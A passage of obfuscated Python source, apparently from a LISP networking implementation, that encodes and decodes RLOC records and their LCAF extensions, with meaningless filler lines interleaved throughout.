packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 16 - 16: IiII * OoO0O00 * i11iIiiIii - ooOoO0o
if 88 - 88: iIii1I11I1II1 / Ii1I * IiII / I1Ii111
self . source . mask_len = self . source . host_mask_len ( )
self . dest . mask_len = self . dest . host_mask_len ( )
if 31 - 31: O0 . I1IiiI
IiIii1i = struct . calcsize ( "HHHH" )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 8 - 8: OoOoOO00
OO0o0OO0 , o0 , IIi1I1 , IiiI11iIi = struct . unpack ( "HHHH" , packet [ : IiIii1i ] )
self . udp_sport = socket . ntohs ( OO0o0OO0 )
self . udp_dport = socket . ntohs ( o0 )
self . udp_length = socket . ntohs ( IIi1I1 )
self . udp_checksum = socket . ntohs ( IiiI11iIi )
packet = packet [ IiIii1i : : ]
return ( packet )
if 99 - 99: iII111i
if 93 - 93: I1Ii111
if 39 - 39: Ii1I
if 10 - 10: OoOoOO00 . iIii1I11I1II1 / I1ii11iIi11i % iII111i / i11iIiiIii
if 14 - 14: i11iIiiIii % o0oOOo0O0Ooo * O0 % iIii1I11I1II1 . IiII - II111iiii
if 14 - 14: Ii1I % ooOoO0o - OoOoOO00
if 52 - 52: OoO0O00 / i1IIi - Ii1I
if 8 - 8: oO0o + ooOoO0o . I1ii11iIi11i . i1IIi / I1IiiI . IiII
if 8 - 8: i1IIi * O0
if 60 - 60: Oo0Ooo - II111iiii + I1IiiI
if 17 - 17: OoOoOO00 % I1IiiI
if 8 - 8: Oo0Ooo
if 49 - 49: OoOoOO00 * I11i - o0oOOo0O0Ooo / OoO0O00 * oO0o
if 51 - 51: ooOoO0o - iIii1I11I1II1 . I11i * OoOoOO00 + I1Ii111 * i1IIi
if 37 - 37: IiII * oO0o / OoooooooOO . OoO0O00
if 77 - 77: II111iiii + OoOoOO00 * OOooOOo
if 9 - 9: II111iiii - i11iIiiIii * o0oOOo0O0Ooo % OoO0O00 * i11iIiiIii / I11i
if 45 - 45: i11iIiiIii * iII111i - I1ii11iIi11i + ooOoO0o % iII111i
if 11 - 11: iIii1I11I1II1
if 48 - 48: iIii1I11I1II1 - Oo0Ooo
if 80 - 80: i1IIi
if 56 - 56: II111iiii - o0oOOo0O0Ooo
if 48 - 48: Oo0Ooo - I1ii11iIi11i - II111iiii . Ii1I . oO0o / iIii1I11I1II1
if 38 - 38: I1Ii111 % i11iIiiIii + Ii1I * ooOoO0o / I1Ii111
if 93 - 93: oO0o
if 60 - 60: I1Ii111 . oO0o / Oo0Ooo * ooOoO0o + OoOoOO00 - i1IIi
if 13 - 13: i11iIiiIii * oO0o / I11i * I1IiiI
if 31 - 31: iIii1I11I1II1 * Ii1I % OOooOOo . II111iiii
if 56 - 56: IiII / i11iIiiIii . o0oOOo0O0Ooo . oO0o - i11iIiiIii
if 23 - 23: I1ii11iIi11i * i11iIiiIii % ooOoO0o
if 47 - 47: iIii1I11I1II1 . OOooOOo / I11i % II111iiii
if 92 - 92: I1ii11iIi11i % i11iIiiIii
if 82 - 82: I1Ii111 * I1ii11iIi11i % Ii1I / o0oOOo0O0Ooo
if 28 - 28: iII111i % OoO0O00 - OOooOOo - Oo0Ooo
if 16 - 16: i11iIiiIii - i11iIiiIii . OoOoOO00 / i1IIi
if 76 - 76: O0 * OoO0O00 / O0
if 23 - 23: I1ii11iIi11i . iIii1I11I1II1 - i11iIiiIii / II111iiii
if 48 - 48: oO0o - II111iiii * I1IiiI
if 78 - 78: I1IiiI * i11iIiiIii * II111iiii
if 19 - 19: OoooooooOO * i11iIiiIii / O0 . I1IiiI % I11i
if 35 - 35: iIii1I11I1II1 + I1IiiI - ooOoO0o / Oo0Ooo * I1ii11iIi11i * Oo0Ooo
if 17 - 17: OoOoOO00
if 24 - 24: iIii1I11I1II1 / OOooOOo % OoooooooOO / O0 / oO0o
if 93 - 93: Oo0Ooo
if 5 - 5: iII111i
if 61 - 61: OOooOOo * OoO0O00 - O0
if 30 - 30: iIii1I11I1II1
if 14 - 14: o0oOOo0O0Ooo + Ii1I
if 91 - 91: OoooooooOO / oO0o + OoOoOO00
if 100 - 100: i1IIi
if 13 - 13: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo
if 31 - 31: i11iIiiIii % OoO0O00 . i11iIiiIii % oO0o - i1IIi
if 62 - 62: oO0o + oO0o . OoooooooOO
if 59 - 59: iIii1I11I1II1 . Oo0Ooo * I11i
if 29 - 29: Oo0Ooo - I1IiiI * I11i
if 58 - 58: i1IIi * Ii1I / ooOoO0o % iIii1I11I1II1
if 24 - 24: OoOoOO00 - o0oOOo0O0Ooo * I1IiiI . I11i / OoO0O00 * Ii1I
if 12 - 12: OoooooooOO % oO0o
if 92 - 92: ooOoO0o % OoO0O00 + O0 + OoOoOO00 / OoO0O00 * iIii1I11I1II1
if 79 - 79: O0
if 71 - 71: OoO0O00 - O0
if 73 - 73: iIii1I11I1II1
if 7 - 7: OoOoOO00
if 55 - 55: oO0o . OoO0O00 + iIii1I11I1II1 + OoOoOO00 / I1ii11iIi11i - O0
if 14 - 14: II111iiii - OoO0O00 - O0 * OoooooooOO / I1IiiI
if 3 - 3: I11i
if 46 - 46: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1
if 25 - 25: II111iiii / OOooOOo + Oo0Ooo - iIii1I11I1II1 - OoOoOO00
if 97 - 97: OOooOOo . OOooOOo / I1ii11iIi11i + I1IiiI * i1IIi
if 53 - 53: O0
if 28 - 28: iII111i % OoO0O00 . OoO0O00 / IiII * Oo0Ooo * iII111i
if 49 - 49: I1IiiI / I1Ii111 * iII111i + I1IiiI % oO0o % ooOoO0o
if 27 - 27: OoO0O00 / iII111i . I1ii11iIi11i
if 71 - 71: OoO0O00 . i11iIiiIii . iIii1I11I1II1 + I1IiiI - o0oOOo0O0Ooo
if 34 - 34: iII111i
if 6 - 6: OoO0O00 . OoOoOO00 + I1ii11iIi11i
if 24 - 24: OoO0O00 . Ii1I
if 26 - 26: O0 * I1IiiI - OOooOOo * OoooooooOO * II111iiii % OoOoOO00
if 56 - 56: OOooOOo * i11iIiiIii % ooOoO0o * OoOoOO00 % Oo0Ooo * IiII
if 30 - 30: i1IIi + o0oOOo0O0Ooo - OoOoOO00 . OOooOOo
if 95 - 95: i1IIi . I11i + O0 . I11i - I11i / Oo0Ooo
if 41 - 41: OoooooooOO . OOooOOo - Ii1I * OoO0O00 % i11iIiiIii
if 7 - 7: Ii1I
if 16 - 16: IiII * o0oOOo0O0Ooo % II111iiii - II111iiii + ooOoO0o
if 55 - 55: OoO0O00 % OoOoOO00
if 58 - 58: Ii1I
if 17 - 17: OoO0O00 - oO0o % Oo0Ooo % oO0o * I1Ii111 / IiII
if 88 - 88: ooOoO0o . II111iiii * O0 % IiII
if 15 - 15: O0 % i1IIi - OOooOOo . IiII
if 1 - 1: I1IiiI
if 40 - 40: o0oOOo0O0Ooo % I11i % O0
if 88 - 88: o0oOOo0O0Ooo - oO0o
if 73 - 73: II111iiii
if 7 - 7: O0 / OoO0O00
if 90 - 90: iII111i % oO0o / iIii1I11I1II1
if 52 - 52: I1IiiI / o0oOOo0O0Ooo
if 20 - 20: I1Ii111 . I1IiiI - iIii1I11I1II1 / iII111i
if 46 - 46: I1Ii111 . i11iIiiIii
if 89 - 89: OoO0O00 - OOooOOo - i1IIi - OoO0O00 % iIii1I11I1II1
if 52 - 52: o0oOOo0O0Ooo * O0 + I1ii11iIi11i
if 83 - 83: I11i + OOooOOo - OoooooooOO
if 7 - 7: IiII % ooOoO0o / OoooooooOO / o0oOOo0O0Ooo + OoO0O00 - OoO0O00
if 15 - 15: i1IIi + OOooOOo / Ii1I
if 51 - 51: OOooOOo + O0
if 91 - 91: i11iIiiIii + o0oOOo0O0Ooo % OoO0O00 / oO0o - i1IIi
if 82 - 82: Ii1I . OoooooooOO + OoooooooOO % OoO0O00 % I1ii11iIi11i
if 65 - 65: Oo0Ooo . I11i
if 7 - 7: Oo0Ooo * II111iiii
if 11 - 11: OoOoOO00 % OoooooooOO
if 92 - 92: OoOoOO00 - iII111i * Ii1I - i1IIi
if 87 - 87: Ii1I * I1Ii111 + iIii1I11I1II1 * o0oOOo0O0Ooo * iIii1I11I1II1 . I11i
if 66 - 66: Ii1I / OoO0O00 . O0 . I11i % OoooooooOO / OOooOOo
if 49 - 49: I1IiiI * iII111i - OoO0O00 % Ii1I + Ii1I * I1Ii111
if 94 - 94: OoOoOO00 - I11i + Ii1I + OoOoOO00 + II111iiii
if 61 - 61: IiII + Ii1I / oO0o . OoooooooOO + iII111i
if 29 - 29: OOooOOo
if 69 - 69: oO0o % OoooooooOO * iII111i
if 58 - 58: oO0o / i11iIiiIii . OoOoOO00 % O0 / iIii1I11I1II1
if 50 - 50: I1Ii111 . I11i / O0 . I11i
if 91 - 91: i11iIiiIii . I1ii11iIi11i + I11i
if 67 - 67: I1ii11iIi11i * I1Ii111 * I1IiiI / I11i - IiII + oO0o
if 11 - 11: O0 + i1IIi / o0oOOo0O0Ooo * OoO0O00
if 64 - 64: i1IIi % IiII . ooOoO0o . iIii1I11I1II1 + OoO0O00 - iIii1I11I1II1
if 52 - 52: II111iiii - IiII
if 91 - 91: iIii1I11I1II1 + iII111i . I11i % i11iIiiIii - i11iIiiIii + I1IiiI
if 75 - 75: I1ii11iIi11i / I1IiiI - iIii1I11I1II1 / OoO0O00 * OOooOOo
if 73 - 73: OoooooooOO % IiII / I1Ii111 * I11i + i1IIi % i11iIiiIii
if 91 - 91: i11iIiiIii
if 6 - 6: O0 - iIii1I11I1II1 + I1Ii111 . o0oOOo0O0Ooo * i11iIiiIii
if 53 - 53: OOooOOo / I1IiiI / oO0o * OOooOOo / i1IIi - I1Ii111
if 71 - 71: O0 + Oo0Ooo % oO0o - o0oOOo0O0Ooo
if 82 - 82: iIii1I11I1II1
if 64 - 64: ooOoO0o + I1IiiI % OOooOOo + II111iiii
if 46 - 46: I1IiiI
if 72 - 72: iII111i
class lisp_rloc_record ( ) :
def __init__ ( self ) :
self . priority = 0
self . weight = 0
self . mpriority = 0
self . mweight = 0
self . local_bit = False
self . probe_bit = False
self . reach_bit = False
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . rloc_name = None
self . keys = None
if 100 - 100: I1IiiI
if 55 - 55: i1IIi % IiII
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
IIiiI11iI = self . rloc_name
if ( cour ) : IIiiI11iI = lisp_print_cour ( IIiiI11iI )
return ( 'rloc-name: {}' . format ( blue ( IIiiI11iI , cour ) ) )
if 24 - 24: Oo0Ooo % I11i . OoOoOO00 + IiII + OoOoOO00 - IiII
if 13 - 13: i1IIi % OoO0O00 * OOooOOo - Oo0Ooo
def print_record ( self , indent ) :
O0ooo0Ooo = self . print_rloc_name ( )
if ( O0ooo0Ooo != "" ) : O0ooo0Ooo = ", " + O0ooo0Ooo
I1i1iiIII1i1 = ""
if ( self . geo ) :
II1 = ""
if ( self . geo . geo_name ) : II1 = "'{}' " . format ( self . geo . geo_name )
I1i1iiIII1i1 = ", geo: {}{}" . format ( II1 , self . geo . print_geo ( ) )
if 17 - 17: OOooOOo - ooOoO0o % II111iiii . I1ii11iIi11i
OoOiIIiI = ""
if ( self . elp ) :
II1 = ""
if ( self . elp . elp_name ) : II1 = "'{}' " . format ( self . elp . elp_name )
OoOiIIiI = ", elp: {}{}" . format ( II1 , self . elp . print_elp ( True ) )
if 19 - 19: o0oOOo0O0Ooo * I1Ii111 / I1Ii111 * II111iiii
oOOOO0o000OoO = ""
if ( self . rle ) :
II1 = ""
if ( self . rle . rle_name ) : II1 = "'{}' " . format ( self . rle . rle_name )
oOOOO0o000OoO = ", rle: {}{}" . format ( II1 , self . rle . print_rle ( False ,
True ) )
if 9 - 9: ooOoO0o
oOo0oo0o0O0O = ""
if ( self . json ) :
II1 = ""
if ( self . json . json_name ) :
II1 = "'{}' " . format ( self . json . json_name )
if 47 - 47: i1IIi
oOo0oo0o0O0O = ", json: {}" . format ( self . json . print_json ( False ) )
if 2 - 2: OoooooooOO
if 13 - 13: oO0o . o0oOOo0O0Ooo . i11iIiiIii * I1ii11iIi11i / ooOoO0o
I1i1Ii = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
I1i1Ii = ", " + self . keys [ 1 ] . print_keys ( )
if 12 - 12: IiII + ooOoO0o . i11iIiiIii - iIii1I11I1II1
if 27 - 27: I11i + iIii1I11I1II1
oOOo0ooO0 = ( "{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}" )
lprint ( oOOo0ooO0 . format ( indent , self . print_flags ( ) , self . priority ,
self . weight , self . mpriority , self . mweight , self . rloc . afi ,
red ( self . rloc . print_address_no_iid ( ) , False ) , O0ooo0Ooo , I1i1iiIII1i1 ,
OoOiIIiI , oOOOO0o000OoO , oOo0oo0o0O0O , I1i1Ii ) )
if 71 - 71: OoOoOO00 + oO0o % OOooOOo * I1IiiI
if 89 - 89: Ii1I % I1Ii111 / Oo0Ooo * Ii1I + OoOoOO00
def print_flags ( self ) :
return ( "{}{}{}" . format ( "L" if self . local_bit else "l" , "P" if self . probe_bit else "p" , "R" if self . reach_bit else "r" ) )
if 5 - 5: Ii1I * I1IiiI + I1Ii111
if 22 - 22: Oo0Ooo . OoO0O00
if 55 - 55: Oo0Ooo % OoooooooOO * II111iiii % OoooooooOO
def store_rloc_entry ( self , rloc_entry ) :
I1II = rloc_entry . rloc if ( rloc_entry . translated_rloc . is_null ( ) ) else rloc_entry . translated_rloc
if 43 - 43: OoO0O00
self . rloc . copy_address ( I1II )
if 50 - 50: II111iiii + OoooooooOO / IiII
if ( rloc_entry . rloc_name ) :
self . rloc_name = rloc_entry . rloc_name
if 82 - 82: i11iIiiIii - oO0o - i1IIi
if 78 - 78: oO0o % iII111i / i1IIi / ooOoO0o
if ( rloc_entry . geo ) :
self . geo = rloc_entry . geo
else :
II1 = rloc_entry . geo_name
if ( II1 and lisp_geo_list . has_key ( II1 ) ) :
self . geo = lisp_geo_list [ II1 ]
if 44 - 44: o0oOOo0O0Ooo + Ii1I + I1IiiI % O0
if 100 - 100: OoooooooOO
if ( rloc_entry . elp ) :
self . elp = rloc_entry . elp
else :
II1 = rloc_entry . elp_name
if ( II1 and lisp_elp_list . has_key ( II1 ) ) :
self . elp = lisp_elp_list [ II1 ]
if 27 - 27: i11iIiiIii % II111iiii + I1Ii111
if 76 - 76: OOooOOo - I1Ii111 + iIii1I11I1II1 + I1IiiI * oO0o
if ( rloc_entry . rle ) :
self . rle = rloc_entry . rle
else :
II1 = rloc_entry . rle_name
if ( II1 and lisp_rle_list . has_key ( II1 ) ) :
self . rle = lisp_rle_list [ II1 ]
if 93 - 93: i11iIiiIii * i11iIiiIii - I1IiiI + iIii1I11I1II1 * i11iIiiIii
if 14 - 14: ooOoO0o . OoooooooOO . I1IiiI - IiII + iIii1I11I1II1
if ( rloc_entry . json ) :
self . json = rloc_entry . json
else :
II1 = rloc_entry . json_name
if ( II1 and lisp_json_list . has_key ( II1 ) ) :
self . json = lisp_json_list [ II1 ]
if 47 - 47: OOooOOo % i1IIi
if 23 - 23: Ii1I * Ii1I / I11i
self . priority = rloc_entry . priority
self . weight = rloc_entry . weight
self . mpriority = rloc_entry . mpriority
self . mweight = rloc_entry . mweight
if 11 - 11: OOooOOo
if 58 - 58: OoO0O00 * OoooooooOO
def encode_json ( self , lisp_json ) :
o0Ooo = lisp_json . json_string
i1Ii1iiI = 0
if ( lisp_json . json_encrypted ) :
i1Ii1iiI = ( lisp_json . json_key_id << 5 ) | 0x02
if 23 - 23: Oo0Ooo % II111iiii
if 96 - 96: ooOoO0o % Ii1I
OOOoooO000O0 = LISP_LCAF_JSON_TYPE
I1i = socket . htons ( LISP_AFI_LCAF )
OooO0OO0o = self . rloc . addr_length ( ) + 2
if 46 - 46: Ii1I
iII = socket . htons ( len ( o0Ooo ) + OooO0OO0o )
if 14 - 14: OoO0O00 * OoooooooOO
IIIii1i11111 = socket . htons ( len ( o0Ooo ) )
IiiiIi1iiii11 = struct . pack ( "HBBBBHH" , I1i , 0 , 0 , OOOoooO000O0 , i1Ii1iiI ,
iII , IIIii1i11111 )
IiiiIi1iiii11 += o0Ooo
if 45 - 45: iIii1I11I1II1 * I1IiiI . OoOoOO00
if 97 - 97: I11i % II111iiii % Ii1I . II111iiii . iIii1I11I1II1
if 98 - 98: i11iIiiIii + O0 - O0 - iII111i
if 25 - 25: oO0o / O0 + I1Ii111 % i11iIiiIii / I1IiiI
if ( lisp_is_json_telemetry ( o0Ooo ) ) :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( self . rloc . afi ) )
IiiiIi1iiii11 += self . rloc . pack_address ( )
else :
IiiiIi1iiii11 += struct . pack ( "H" , 0 )
if 62 - 62: iII111i . I11i * i1IIi + iII111i
return ( IiiiIi1iiii11 )
if 95 - 95: Ii1I / o0oOOo0O0Ooo % ooOoO0o - I1IiiI / OOooOOo * OOooOOo
if 6 - 6: OoO0O00 % IiII + iIii1I11I1II1
def encode_lcaf ( self ) :
I1i = socket . htons ( LISP_AFI_LCAF )
IiIoOo0ooo = ""
if ( self . geo ) :
IiIoOo0ooo = self . geo . encode_geo ( )
if 26 - 26: I11i - i1IIi - Oo0Ooo * O0 * OOooOOo . OoooooooOO
if 99 - 99: oO0o . OoO0O00 / OOooOOo
Ii1111i = ""
if ( self . elp ) :
i1iiIiI = ""
for IIii in self . elp . elp_nodes :
IiiiII = socket . htons ( IIii . address . afi )
O0OooO00O0 = 0
if ( IIii . eid ) : O0OooO00O0 |= 0x4
if ( IIii . probe ) : O0OooO00O0 |= 0x2
if ( IIii . strict ) : O0OooO00O0 |= 0x1
O0OooO00O0 = socket . htons ( O0OooO00O0 )
i1iiIiI += struct . pack ( "HH" , O0OooO00O0 , IiiiII )
i1iiIiI += IIii . address . pack_address ( )
if 22 - 22: iIii1I11I1II1 % iIii1I11I1II1 . o0oOOo0O0Ooo
if 46 - 46: oO0o
I1Iiiii1i = socket . htons ( len ( i1iiIiI ) )
Ii1111i = struct . pack ( "HBBBBH" , I1i , 0 , 0 , LISP_LCAF_ELP_TYPE ,
0 , I1Iiiii1i )
Ii1111i += i1iiIiI
if 78 - 78: i1IIi % oO0o + IiII
if 75 - 75: O0 + I1ii11iIi11i
oo0oO0 = ""
if ( self . rle ) :
i1ii1i1Iii = ""
for IiioOoo in self . rle . rle_nodes :
IiiiII = socket . htons ( IiioOoo . address . afi )
i1ii1i1Iii += struct . pack ( "HBBH" , 0 , 0 , IiioOoo . level , IiiiII )
i1ii1i1Iii += IiioOoo . address . pack_address ( )
if ( IiioOoo . rloc_name ) :
i1ii1i1Iii += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
i1ii1i1Iii += IiioOoo . rloc_name + "\0"
if 15 - 15: o0oOOo0O0Ooo
if 55 - 55: i11iIiiIii / OoooooooOO - I11i
if 89 - 89: I11i - i1IIi - i1IIi * OOooOOo - O0
oOo0 = socket . htons ( len ( i1ii1i1Iii ) )
oo0oO0 = struct . pack ( "HBBBBH" , I1i , 0 , 0 , LISP_LCAF_RLE_TYPE ,
0 , oOo0 )
oo0oO0 += i1ii1i1Iii
if 60 - 60: OoOoOO00 + i11iIiiIii
if 3 - 3: II111iiii
O0OOoO0000ooO = ""
if ( self . json ) :
O0OOoO0000ooO = self . encode_json ( self . json )
if 53 - 53: iIii1I11I1II1
if 79 - 79: Ii1I - II111iiii / oO0o + Oo0Ooo . I1IiiI
OOoO0o0 = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
OOoO0o0 = self . keys [ 1 ] . encode_lcaf ( self . rloc )
if 51 - 51: OoO0O00 . OoO0O00 - iIii1I11I1II1
if 41 - 41: OoO0O00 * i11iIiiIii / i1IIi + o0oOOo0O0Ooo . IiII
iii111iIiiIII = ""
if ( self . rloc_name ) :
iii111iIiiIII += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
iii111iIiiIII += self . rloc_name + "\0"
if 21 - 21: OOooOOo / O0
if 46 - 46: OoooooooOO % Oo0Ooo % i1IIi / ooOoO0o - I11i
IiiiI = len ( IiIoOo0ooo ) + len ( Ii1111i ) + len ( oo0oO0 ) + len ( OOoO0o0 ) + 2 + len ( O0OOoO0000ooO ) + self . rloc . addr_length ( ) + len ( iii111iIiiIII )
if 57 - 57: I1Ii111 * I1ii11iIi11i / i1IIi % i11iIiiIii
IiiiI = socket . htons ( IiiiI )
oOOo00Oo0 = struct . pack ( "HBBBBHH" , I1i , 0 , 0 , LISP_LCAF_AFI_LIST_TYPE ,
0 , IiiiI , socket . htons ( self . rloc . afi ) )
oOOo00Oo0 += self . rloc . pack_address ( )
return ( oOOo00Oo0 + iii111iIiiIII + IiIoOo0ooo + Ii1111i + oo0oO0 + OOoO0o0 + O0OOoO0000ooO )
if 78 - 78: iIii1I11I1II1 * OoOoOO00 - I1IiiI . O0 / I1Ii111
if 5 - 5: I1ii11iIi11i % OoOoOO00 . OoooooooOO . o0oOOo0O0Ooo + i11iIiiIii
def encode ( self ) :
O0OooO00O0 = 0
if ( self . local_bit ) : O0OooO00O0 |= 0x0004
if ( self . probe_bit ) : O0OooO00O0 |= 0x0002
if ( self . reach_bit ) : O0OooO00O0 |= 0x0001
if 54 - 54: ooOoO0o - O0 + iII111i
IiiiIi1iiii11 = struct . pack ( "BBBBHH" , self . priority , self . weight ,
self . mpriority , self . mweight , socket . htons ( O0OooO00O0 ) ,
socket . htons ( self . rloc . afi ) )
if 34 - 34: Ii1I - OOooOOo % iII111i
if ( self . geo or self . elp or self . rle or self . keys or self . rloc_name or self . json ) :
if 48 - 48: oO0o - O0
IiiiIi1iiii11 = IiiiIi1iiii11 [ 0 : - 2 ] + self . encode_lcaf ( )
else :
IiiiIi1iiii11 += self . rloc . pack_address ( )
if 17 - 17: iIii1I11I1II1 . IiII / ooOoO0o % I11i + o0oOOo0O0Ooo - iIii1I11I1II1
return ( IiiiIi1iiii11 )
if 95 - 95: OoOoOO00 + OOooOOo - I11i * i1IIi + i1IIi * O0
if 60 - 60: Oo0Ooo + I11i % iIii1I11I1II1 % oO0o - I1Ii111 / o0oOOo0O0Ooo
def decode_lcaf ( self , packet , nonce , ms_json_encrypt ) :
O0O00Oo = "HBBBBH"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( len ( packet ) < IiIii1i ) : return ( None )
if 9 - 9: IiII / oO0o % O0 * I1Ii111 - iIii1I11I1II1 % i1IIi
IiiiII , iI1i , O0OooO00O0 , OOOoooO000O0 , iiI1i111I1 , iII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] )
if 83 - 83: OoOoOO00 + OOooOOo / OoooooooOO
if 39 - 39: OoO0O00 % iII111i . oO0o . II111iiii - i11iIiiIii
iII = socket . ntohs ( iII )
packet = packet [ IiIii1i : : ]
if ( iII > len ( packet ) ) : return ( None )
if 85 - 85: O0 - OoOoOO00
if 17 - 17: o0oOOo0O0Ooo / i1IIi / OOooOOo
if 91 - 91: I1ii11iIi11i / Ii1I - OoOoOO00 . I11i / oO0o
if 16 - 16: IiII % iII111i . oO0o . I1IiiI % O0 * I11i
if ( OOOoooO000O0 == LISP_LCAF_AFI_LIST_TYPE ) :
while ( iII > 0 ) :
O0O00Oo = "H"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( iII < IiIii1i ) : return ( None )
if 99 - 99: OoOoOO00 / OoooooooOO + iII111i * I11i * i11iIiiIii + OOooOOo
ii11I = len ( packet )
IiiiII = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
IiiiII = socket . ntohs ( IiiiII )
if 40 - 40: II111iiii / I11i % I1IiiI - O0
if ( IiiiII == LISP_AFI_LCAF ) :
packet = self . decode_lcaf ( packet , nonce , ms_json_encrypt )
if ( packet == None ) : return ( None )
else :
packet = packet [ IiIii1i : : ]
self . rloc_name = None
if ( IiiiII == LISP_AFI_NAME ) :
packet , IIiiI11iI = lisp_decode_dist_name ( packet )
self . rloc_name = IIiiI11iI
else :
self . rloc . afi = IiiiII
packet = self . rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 39 - 39: i11iIiiIii - OoOoOO00 % OOooOOo + ooOoO0o + i11iIiiIii
if 59 - 59: IiII / OoOoOO00 - I1Ii111 - ooOoO0o . oO0o
if 87 - 87: oO0o + I1IiiI * I1Ii111 * o0oOOo0O0Ooo + O0
iII -= ii11I - len ( packet )
if 21 - 21: I1Ii111 + OoOoOO00 + OoOoOO00 . II111iiii / I1Ii111 . I1IiiI
if 66 - 66: I1Ii111 % oO0o . iII111i * i1IIi
elif ( OOOoooO000O0 == LISP_LCAF_GEO_COORD_TYPE ) :
if 81 - 81: OoooooooOO * I1IiiI / I1Ii111
if 10 - 10: I1IiiI - II111iiii / IiII * II111iiii
if 67 - 67: II111iiii . Ii1I % oO0o . Oo0Ooo + IiII
if 10 - 10: OOooOOo - OoO0O00 * oO0o / iIii1I11I1II1 - OoOoOO00
I1Ii1i111I = lisp_geo ( "" )
packet = I1Ii1i111I . decode_geo ( packet , iII , iiI1i111I1 )
if ( packet == None ) : return ( None )
self . geo = I1Ii1i111I
if 51 - 51: O0 + Ii1I * OoooooooOO . oO0o + OoooooooOO
elif ( OOOoooO000O0 == LISP_LCAF_JSON_TYPE ) :
O0iI1Iii = iiI1i111I1 & 0x02
if 35 - 35: I1ii11iIi11i + O0
if 7 - 7: OoooooooOO % iII111i % Ii1I % II111iiii / oO0o
if 15 - 15: OoO0O00
if 18 - 18: OoooooooOO / OOooOOo % i1IIi - i1IIi / Oo0Ooo
O0O00Oo = "H"
IiIii1i = struct . calcsize ( O0O00Oo )
if ( iII < IiIii1i ) : return ( None )
if 94 - 94: I1Ii111 + i11iIiiIii / iII111i + OoooooooOO % i1IIi
IIIii1i11111 = struct . unpack ( O0O00Oo , packet [ : IiIii1i ] ) [ 0 ]
IIIii1i11111 = socket . ntohs ( IIIii1i11111 )
if ( iII < IiIii1i + IIIii1i11111 ) : return ( None )
if 57 - 57: iIii1I11I1II1 - i11iIiiIii / II111iiii
packet = packet [ IiIii1i : : ]
self . json = lisp_json ( "" , packet [ 0 : IIIii1i11111 ] , O0iI1Iii ,
ms_json_encrypt )
packet = packet [ IIIii1i11111 : : ]
if 35 - 35: I1IiiI - IiII * I1Ii111 - ooOoO0o % oO0o
if 88 - 88: IiII * OoO0O00 / IiII * I1IiiI + O0 / IiII
if 41 - 41: OoOoOO00
if 81 - 81: Ii1I . I1IiiI % o0oOOo0O0Ooo . OoOoOO00
IiiiII = socket . ntohs ( struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ] )
packet = packet [ 2 : : ]
if 94 - 94: oO0o % Oo0Ooo + OoO0O00 * oO0o - i11iIiiIii / I11i
if ( IiiiII != 0 and lisp_is_json_telemetry ( self . json . json_string ) ) :
self . rloc . afi = IiiiII
packet = self . rloc . unpack_address ( packet )
if 46 - 46: IiII - OoO0O00 * iII111i . I1Ii111 - ooOoO0o . i1IIi
if 53 - 53: I1Ii111 * I1IiiI + Oo0Ooo + I1IiiI + OOooOOo
elif ( OOOoooO000O0 == LISP_LCAF_ELP_TYPE ) :
if 8 - 8: i11iIiiIii + OoOoOO00 . I1ii11iIi11i / OoooooooOO % II111iiii
if 21 - 21: oO0o - o0oOOo0O0Ooo + ooOoO0o . I1IiiI * oO0o * Ii1I
if 41 - 41: i1IIi % i11iIiiIii + I11i % OoooooooOO / I1ii11iIi11i
if 8 - 8: OoooooooOO - OoO0O00 / i11iIiiIii / O0 . IiII
O0OoO0O0O0oO = lisp_elp ( None )
O0OoO0O0O0oO . elp_nodes = [ ]
while ( iII > 0 ) :
O0OooO00O0 , IiiiII = struct . unpack ( "HH" , packet [ : 4 ] )
if 58 - 58: I1ii11iIi11i + Oo0Ooo . Oo0Ooo / iII111i . i11iIiiIii
IiiiII = socket . ntohs ( IiiiII )
if ( IiiiII == LISP_AFI_LCAF ) : return ( None )
if 8 - 8: I1ii11iIi11i + O0 - oO0o % II111iiii . I1Ii111
IIii = lisp_elp_node ( )
O0OoO0O0O0oO . elp_nodes . append ( IIii )
if 86 - 86: IiII
O0OooO00O0 = socket . ntohs ( O0OooO00O0 )
IIii . eid = ( O0OooO00O0 & 0x4 )
IIii . probe = ( O0OooO00O0 & 0x2 )
IIii . strict = ( O0OooO00O0 & 0x1 )
IIii . address . afi = IiiiII
IIii . address . mask_len = IIii . address . host_mask_len ( )
packet = IIii . address . unpack_address ( packet [ 4 : : ] )
iII -= IIii . address . addr_length ( ) + 4
if 71 - 71: Ii1I - i1IIi . I1IiiI
O0OoO0O0O0oO . select_elp_node ( )
self . elp = O0OoO0O0O0oO
if 15 - 15: i1IIi % II111iiii / II111iiii - I1ii11iIi11i - I11i % i1IIi
elif ( OOOoooO000O0 == LISP_LCAF_RLE_TYPE ) :
if 54 - 54: i1IIi . OoO0O00 + iII111i + OoO0O00 * i1IIi
if 13 - 13: Oo0Ooo / OoO0O00 + OOooOOo
if 90 - 90: OoO0O00 * i11iIiiIii / oO0o
if 91 - 91: iII111i - OoOoOO00 / Oo0Ooo % II111iiii / II111iiii / o0oOOo0O0Ooo
iI1Ii11 = lisp_rle ( None )
iI1Ii11 . rle_nodes = [ ]
while ( iII > 0 ) :
oOo0oo , IIIi1i1iIIIi , oOOoOoooOo0o , IiiiII = struct . unpack ( "HBBH" , packet [ : 6 ] )
